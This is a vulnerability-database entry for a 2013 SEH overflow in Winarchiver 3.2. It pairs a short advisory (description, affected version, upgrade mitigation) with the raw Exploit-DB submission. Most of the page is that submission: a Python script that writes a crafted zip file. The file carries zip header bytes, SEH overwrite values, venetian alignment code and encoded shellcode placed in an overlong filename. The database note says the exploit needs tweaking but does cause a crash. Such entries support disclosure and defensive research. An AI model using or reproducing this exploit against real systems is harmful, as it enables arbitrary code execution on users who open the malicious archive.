Winarchiver V 3.2 SEH Overflow

vendor:

Winarchiver

by:

Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon

9,3

CVSS

HIGH

SEH Overflow

119

CWE

Product Name: Winarchiver

Affected Version From: 3.2

Affected Version To: 3.2

Patch Exists: YES

Related CWE: N/A

CPE: a:winarchiver:winarchiver

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2013

Winarchiver V 3.2 SEH Overflow

Winarchiver V 3.2 is vulnerable to a SEH Overflow vulnerability. By sending a specially crafted zip file, an attacker can overwrite the SEH handler and execute arbitrary code. The vulnerability is caused due to a boundary error when handling zip files. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted zip file with an overly long filename.

Mitigation:

Upgrade to the latest version of Winarchiver V 3.2 or later.

Source

Exploit-DB raw data:

#/usr/bin/python
# Exploit Title: Winarchiver V 3.2 SEH Overflow
# Date: April 24, 2013
# Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon
# Organization: RealPentesting 
# Vendor Homepage: http://winarchiver.com
# Software Link: http://www.winarchiver.com/WinArchiver3.exe
# Version: 3.2 
# Tested on: Windows XP SP3

# Exploit-DB Note:
# This submission needs tweaking but a crash does occur 

zip_header = (
"\x50\x4B\x03\x04\x0A\x00\x04\x02\x00\x00\xE5\x18\xE9\x3E\xCC\xD4"
"\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\x08\x00\x00\x00\x54\x65"
"\x73\x74\x2E\x74\x78\x74\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20"
"\x74\x65\x73\x74\x21\x50\x4B\x01\x02\x14\x00\x0A\x00\x40\x00\x00"
"\x00\xE5\x18\xE9\x3E\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00"
"\x00\xBE\x20\x00\x00\x00\x00\x00\x00\x01\x00\x3D\xAC\xBD\x04\x00"
"\x00\x00\x00"
)
zip_final=(
"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\xEC\x20\x00"
"\x00\x35\x00\x00\x00\x00\x00"
)
seh = "\x31\x48" #ppr 0x00480031
nextseh = "\x58\x70"
venetian = (
"\x55\x55"
"\x70"
"\x58"
"\x70"
"\x05\x25\x11"
"\x55"
"\x2d\x19\x11"
"\x55"
"\x50"
"\x55"
"\xc7"
)
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"
"AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"
"BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"
"TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"
"3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"
"QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"
"K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"
"2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"
"60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"
"KKK045M5WKQ7N3RRRORJM0QCKOHUA"
)
buffer =  "\x41" * (205+216) + shellcode + "\x41" * (2000-216-len(shellcode)) + nextseh + seh + venetian + "\x42" * (6173-len(venetian))
print len(buffer)
payload = buffer
mefile = open('seh_winarch.zip','w')
mefile.write(zip_header + buffer + zip_final)
mefile.close()